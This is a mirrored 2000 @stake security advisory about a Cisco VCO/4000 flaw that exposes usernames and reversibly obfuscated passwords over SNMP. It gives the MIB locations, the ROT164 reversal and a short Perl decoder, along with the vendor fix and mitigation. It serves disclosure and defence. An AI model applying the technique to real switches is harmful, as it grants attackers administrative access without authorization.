[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Cisco VCO/4000 SNMP Username and Password Retrieval

Title: Cisco VCO/4000 SNMP Username and Password Retrieval
Released by: @stake
Date: 26th October 2000
Printable version: Click here 
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1





                              @stake, Inc.

                            www.atstake.com



                           Security Advisory





Advisory Name: Cisco VCO/4000 SNMP Username and Password Retrieval

 Release Date: 10/26/2000

  Application: N/A

     Platform: Cisco (Formerly Summa Four) VCO/4K software version 5.1.3 and

               below

     Severity: An attacker can obtain login and password credentials

               to the administrative interfaces with the read-only

               community string.

    Author(s): David Goldsmith 

               Brian Carrier 

               Rex Warren 

Vendor Status: Software upgrade available

          Web: www.atstake.com/research/advisories/2000/A102600-1.txt





Overview:



    This advisory describes a vulnerability that exists in Cisco Systems'

Virtual Central Office 4000 (VCO/4K).  The VCO/4K is a programmable switch

that provides numerous telephony capabilities including voice services,

switching for wireless and wireline networks, and circuit/packet-switched

network gateway services.  The VCO/4K can be administered via several

TCP/IP interfaces, including Telnet and SNMP.  There is a vulnerability in

the SNMP interface that allows an attacker to enumerate username and

obfuscated password pairs for the Telnet interface.  Since the obfuscation

method used on the passwords is reversible, administrative access to the

VCO/4K can be obtained.





Detailed Description:



    If an attacker knows the read-only community string of a VCO/4K,

then they can obtain a list of users and their obfuscated passwords.

The obfuscation can be easily reversed, allowing an attacker to obtain

additional privileges on the VCO/4K.



    The SNMP MIB of the VCO/4K contains, among other data, a list of

usernames and passwords.  These entries start at:



        [ ... ]

        enterprises.886.1.1.1.1.2.1 = "someuser"

        enterprises.886.1.1.1.1.3.1 = 0

        enterprises.886.1.1.1.1.4.1 = ".At4Cqq"

        enterprises.886.1.1.1.1.5.1 = 0

        [ ... ]



    The enterprises.886.1.1.1.1.2.1 entry is the first username, with

enterprises.886.1.1.1.1.4.1 being the corresponding (albeit obfuscated)

password.



    The password obfuscation algorithm is a substitution cipher that

replaces each ASCII character by one that is 164 places away.  For

historical reasons, we will call this ROT164():



    ROT164(X) = 164 - X



Using the example above:



    ROT164(".") = 164 - 046 = 118 => "v"

    ROT164("A") = 164 - 065 = 099 => "c"

    ROT164("t") = 164 - 116 = 048 => "0"

    ROT164("4") = 164 - 052 = 112 => "p"

    ROT164("C") = 164 - 067 = 097 => "a"

    ROT164("q") = 164 - 113 = 051 => "3"

    ROT164("q") = 164 - 113 = 051 => "3"





Temporary Solution:



    If SNMP is not required on the VCO/4K, then disable the service.  If

it is required, then verify that the community string is difficult to

guess and that access to it is restricted.





Vendor Response:



    Cisco Systems is aware of the vulnerability reported by @stake and has

prepared two software releases to address the problem.  In Cisco VCO/4K

software version 5.1.4, the display of the usernames and encrypted

passwords has been removed from SNMP responses.  Version 5.2, to be

released in early December, also includes enhancements replacing the weak

password encryption with MD5 -- similar to Type 5 passwords in Cisco

IOS -- as well as general improvements to access control.



    The Cisco PSIRT appreciates the efforts made by @stake in

communicating this vulnerability to us and working with us to resolve it.





Proof-of-Concept Code:



    The decryption code was written in PERL by Rex Warren.  Due to the

cyclic properties of ROT164, the program accepts both the plaintext and

the obfuscated password as standard input and returns the opposite

version.



<--- cut here --->

#!/usr/bin/perl



printf ("Cisco VCO/4K Password [De]Obfuscator\n");

printf ("\t\@stake, Inc.\n");

printf ("\tRex Warren, Brian Carrier, David Goldsmith\n");



printf ("Enter Password: ");

$pw = ;

chop $pw;



printf("Result: ");

for ($pos = 0; $pos < length($pw); $pos++){

    printf("%s", chr(164 - ord(substr($pw, $pos, 1))));

}

printf("\n");



<--- cut here --->



For more advisories: http://www.atstake.com/advisories/

PGP Key: http://www.atstake.com/research/pgp_key.asc



Copyright 2000 @stake, Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----

Version: PGP 7.0



iQA/AwUBOfim6FESXwDtLdMhEQJNBQCg/+qtlAhZhBTkyS0NM79IgslLstkAmgJ1

QJWVuPg3wpwnN+3NBLCm7kpJ

=KyIB

-----END PGP SIGNATURE-----






(C) 1999-2000 All rights reserved.